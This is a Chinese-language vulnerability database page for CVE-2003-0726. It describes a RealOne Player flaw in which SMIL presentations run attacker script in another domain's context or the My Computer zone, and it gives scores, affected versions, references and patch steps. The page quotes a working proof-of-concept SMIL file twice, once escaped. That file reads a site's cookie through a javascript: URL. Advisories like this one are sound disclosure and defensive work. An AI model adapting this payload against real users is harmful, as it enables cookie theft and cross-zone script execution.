CVE-2003-0726
CVSS5.1
发布时间 :2003-10-20 00:00:00
修订时间 :2008-09-05 16:35:05
NMCOES    

[原文]RealOne player allows remote attackers to execute arbitrary script in the "My Computer" zone via a SMIL presentation with a URL that references a scripting protocol, which is executed in the security context of the previously loaded URL, as demonstrated using a "javascript:" URL in the area tag.


[CNNVD]RealOne Player SMIL远程文件脚本执行漏洞(CNNVD-200310-060)

        
        RealOne Player是Real公司开发和维护的多媒体播放器软件。
        RealOne Player在不正确处理嵌入脚本多媒体综合语言(SMIL)文件,远程攻击者可以利用这个漏洞诱使用户访问SMIL文件,导致用户基于验证的Cookie信息泄露。
        攻击者如果把恶意脚本嵌入到SMIL文件,诱使RealOne用户访问,当解析SMIL文件时,恶意脚本可以以用户权限在系统上执行,导致窃取用户基于Cookie的验证信息或进行其他进一步的攻击。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:realnetworks:realone_player:6.0.10.505:gold
cpe:/a:realnetworks:realone_player:2.0
cpe:/a:realnetworks:realone_player:6.0.11.841
cpe:/a:realnetworks:realone_player:6.0.11.830
cpe:/a:realnetworks:realone_player:6.0.11.853
cpe:/a:realnetworks:realone_desktop_manager
cpe:/a:realnetworks:realone_player:6.0.11.818
cpe:/a:realnetworks:realone_enterprise_desktop:6.0.11.774

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0726
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0726
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-060
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8453
(VENDOR_ADVISORY)  BID  8453
http://www.digitalpranksters.com/advisories/realnetworks/smilscriptprotocol.html
(VENDOR_ADVISORY)  MISC  http://www.digitalpranksters.com/advisories/realnetworks/smilscriptprotocol.html
http://xforce.iss.net/xforce/xfdb/13028
(UNKNOWN)  XF  realone-smil-execute-code(13028)
http://www.service.real.com/help/faq/security/securityupdate_august2003.html
(UNKNOWN)  CONFIRM  http://www.service.real.com/help/faq/security/securityupdate_august2003.html
http://www.securityfocus.com/archive/1/335293
(VENDOR_ADVISORY)  BUGTRAQ  20030827 RealOne Player Allows Cross Zone and Domain Access
http://securitytracker.com/id?1007532
(UNKNOWN)  SECTRACK  1007532

- 漏洞信息

RealOne Player SMIL远程文件脚本执行漏洞
中危 输入验证
2003-10-20 00:00:00 2006-01-05 00:00:00
远程  
        
        RealOne Player是Real公司开发和维护的多媒体播放器软件。
        RealOne Player在不正确处理嵌入脚本多媒体综合语言(SMIL)文件,远程攻击者可以利用这个漏洞诱使用户访问SMIL文件,导致用户基于验证的Cookie信息泄露。
        攻击者如果把恶意脚本嵌入到SMIL文件,诱使RealOne用户访问,当解析SMIL文件时,恶意脚本可以以用户权限在系统上执行,导致窃取用户基于Cookie的验证信息或进行其他进一步的攻击。
        

- 公告与补丁

        厂商补丁:
        Real Networks
        -------------
        RealOne Player (English Only)可以通过如下步骤更新:
        1、在工具菜单中选择Update。
        2、选择对话框的Next到"RealOne Player"组件。
        3、点击安装按钮下载和安装升级。
        RealOne Player v2 (all languages)用户使用如下方法升级:
        1、在工具菜单中选择Update。
        2、选择对话框的Next到""Security Update August 2003"组件。
        3、点击安装按钮下载和安装升级。
        RealOne企业级产品:
        RealOne Desktop Manager:
        
        http://licensekey.realnetworks.com/rnforms/products/tools/rdm/index.html

        RealOne Enterprise Desktop:
        
        http://forms.real.com/rnforms/products/tools/red/index.html

- 漏洞信息 (23043)

RealOne Player 1.0/2.0/6.0.10/6.0.11 SMIL File Script Execution Vulnerability (EDBID:23043)
windows remote
2003-08-19 Verified
0 KrazySnake
N/A [点击下载]
source: http://www.securityfocus.com/bid/8453/info

Real Networks has reported a vulnerability in RealOne Player. Script embedded in SMIL presentations may be executed in the context of a domain that is specified by an attacker. This could allow for theft of cookie-based authentication credentials or other attacks.

This vulnerability could also be exploited to execute script code in the context of the My Computer Zone, which could lead to installation and execution of malicious code on the client systems. This has been demonstrated with a newly reported vulnerability that is a variant of this issue (BID 9378), making it possible to exploit this issue to the same ends as the new vulnerability.

This issue is believed to affect RealOne Player for Microsoft Windows operating systems.


We have created a SMIL file that will read the cookie from
https://order.real.com/pt/order.html. The cookie will be read 9 seconds
after the audio has begun.

Source Code:
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
<head>
<meta name="title" content="DigitalPranksters.com Proof of Concept"/>
<meta name="author" content="DigitalPranksters.com"/>
<meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
</head>
<body>
<audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
<area href="https://order.real.com/pt/order.html" begin="1s"
external="true" actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
<rn:param name="width" value="10"/>
<rn:param name="height" value="10"/>
</area>
<area href="javascript:alert('Hi there! I\'m a digital prankster. I
just read your cookie from ' + document.domain + ' over the ' +
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
</audio>
</body>
</smil> 		

- 漏洞信息

2460
RealOne Player SMIL Arbitrary Script Execution

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-08-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RealOne Player SMIL File Script Execution Vulnerability
Input Validation Error 8453
Yes No
2003-08-19 12:00:00 2009-07-11 10:56:00
Discovery is credited to KrazySnake (krazysnake@digitalpranksters.com).

- 受影响的程序版本

Real Networks RealOne Player Gold for Windows 6.0.10 .505
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Real Networks RealOne Player 6.0.11 .853
Real Networks RealOne Player 6.0.11 .841
Real Networks RealOne Player 6.0.11 .830
Real Networks RealOne Player 6.0.11 .818
Real Networks RealOne Player 2.0
Real Networks RealOne Player 1.0
Real Networks RealOne Enterprise Desktop 6.0.11 .774
Real Networks RealOne Desktop Manager

- 漏洞讨论

Real Networks has reported a vulnerability in RealOne Player. Script embedded in SMIL presentations may be executed in the context of a domain that is specified by an attacker. This could allow for theft of cookie-based authentication credentials or other attacks.

This vulnerability could also be exploited to execute script code in the context of the My Computer Zone, which could lead to installation and execution of malicious code on the client systems. This has been demonstrated with a newly reported vulnerability that is a variant of this issue (BID 9378), making it possible to exploit this issue to the same ends as the new vulnerability.

This issue is believed to affect RealOne Player for Microsoft Windows operating systems.

- 漏洞利用

The following information regarding a proof of concept exploit has been taken verbatim from the DigitalPranksters advisory:

We have created a SMIL file that will read the cookie from
https://order.real.com/pt/order.html. The cookie will be read 9 seconds
after the audio has begun.

Source Code:
&lt;smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions"&gt;
&lt;head&gt;
&lt;meta name="title" content="DigitalPranksters.com Proof of Concept"/&gt;
&lt;meta name="author" content="DigitalPranksters.com"/&gt;
&lt;meta name="copyright" content="(c)2003 DigitalPranksters.com"/&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr"&gt;
&lt;area href="https://order.real.com/pt/order.html" begin="1s"
external="true" actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin"&gt;
&lt;rn:param name="width" value="10"/&gt;
&lt;rn:param name="height" value="10"/&gt;
&lt;/area&gt;
&lt;area href="javascript:alert('Hi there! I\'m a digital prankster. I
just read your cookie from ' + document.domain + ' over the ' +
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/&gt;
&lt;/audio&gt;
&lt;/body&gt;
&lt;/smil&gt;

- 解决方案

Real Networks has released patches to address this issue. RealOne Player updates may be applied via the Software Update feature. Please see the Real Networks announcement for details on obtaining and applying updates for RealOne Enterprise Product.

Real Networks has released new patches to address these issues. Please see the Real Networks announcement released in October 2003, for details on obtaining and applying updates for RealOne Enterprise Product.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站